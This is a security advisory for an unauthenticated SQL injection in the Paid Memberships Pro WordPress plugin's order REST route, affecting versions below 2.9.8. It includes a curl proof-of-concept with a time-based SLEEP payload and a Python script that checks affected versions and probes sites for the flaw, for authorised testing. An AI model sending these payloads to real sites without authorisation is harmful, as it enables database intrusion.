The plugin does not properly sanitise and escape the code parameter before using it in a SQL statement in the /pmpro/v1/order REST route, leading to a SQL injection exploitable by unauthenticated users.
curl "https://example.com/?rest_route=/pmpro/v1/order&code=a' OR (SELECT 1 FROM (SELECT(SLEEP(2)))a)--%20-"
| CPE | Name | Operator | Version |
|---|---|---|---|
| | paid-memberships-pro | lt | 2.9.8 |

The operator lt means that every release earlier than 2.9.8 is affected.
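The following script is an added example, not part of the WPScan advisory and not code from the Paid Memberships Pro plugin. It turns the two facts on this page into checks a practitioner can run: the affected-version range from the table, and the time-based blind injection from the PoC. The PoC is reproduced with SLEEP(n) parameterised so that a SLEEP(0) request with the identical query shape serves as the latency baseline; the injected OR clause may be evaluated once per row, so the measured delay is treated as a lower bound (80% of the requested delay) rather than an exact match, and each probe is repeated to avoid mistaking one slow response for injection. The target URL https://example.com, the MySQL/MariaDB backend (SLEEP is MySQL-specific), the 80% threshold and the simulated_fetch stand-in are assumptions made for this example.

```python
"""Version check and time-based blind SQLi probe for the advisory above.

Added example; assumes a WordPress target whose vulnerable route is reachable
at /?rest_route=/pmpro/v1/order and a MySQL/MariaDB backend (SLEEP()).
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request

REST_ROUTE = "/pmpro/v1/order"
FIXED_VERSION = (2, 9, 8)  # table operator "lt": every release below this is affected


def parse_version(text):
    """'2.9.7' -> (2, 9, 7); trailing non-digits in a component ('7-beta') are ignored."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group(0)) if m else 0)
    return tuple(parts)


def is_affected_version(version):
    """True for any plugin version strictly below 2.9.8 (Python compares tuples lexicographically)."""
    return parse_version(version) < FIXED_VERSION


def build_probe_url(base_url, sleep_seconds):
    """Same injection shape as the advisory PoC, with SLEEP(n) parameterised.

    A SLEEP(0) probe gives a baseline with identical query structure, so the only
    difference between baseline and delayed requests is the sleep itself.
    """
    payload = f"a' OR (SELECT 1 FROM (SELECT(SLEEP({int(sleep_seconds)})))a)-- -"
    query = urllib.parse.urlencode({"rest_route": REST_ROUTE, "code": payload})
    return f"{base_url.rstrip('/')}/?{query}"


def timed_get(url, timeout=60):
    """Return how long the server held the request, whatever the status code."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except urllib.error.URLError:
        pass  # 4xx/5xx or a timeout: the elapsed time is still the signal
    return time.monotonic() - start


def is_time_based_injectable(base_url, delay=5, samples=3, fetch=timed_get):
    """True when the slowest SLEEP(0) response is still beaten by the fastest
    SLEEP(delay) response by at least 80% of the requested delay.

    Using max(baseline) against min(delayed) over several samples means a single
    noisy response cannot produce a false positive on its own.
    """
    baseline = max(fetch(build_probe_url(base_url, 0)) for _ in range(samples))
    delayed = min(fetch(build_probe_url(base_url, delay)) for _ in range(samples))
    return delayed - baseline >= 0.8 * delay


def simulated_fetch(url):
    """Constructed stand-in for timed_get so the probe logic can be dry-run offline:
    pretends the backend is vulnerable and answers after 0.2 s plus the SLEEP(n)
    carried in the URL."""
    code = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)["code"][0]
    n = int(re.search(r"SLEEP\((\d+)\)", code).group(1))
    return 0.2 + n


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        # Live probe against a host you are authorised to test, e.g. https://example.com
        print("time-based SQLi:", is_time_based_injectable(sys.argv[1]))
    else:
        print("affected 2.9.7:", is_affected_version("2.9.7"))
        print("dry run:", is_time_based_injectable("https://example.com", fetch=simulated_fetch))
```

Run it with no arguments for the offline dry run, or pass the site base URL to probe a host you are authorised to test; a positive result should be confirmed with a second, distinct delay value before it is reported.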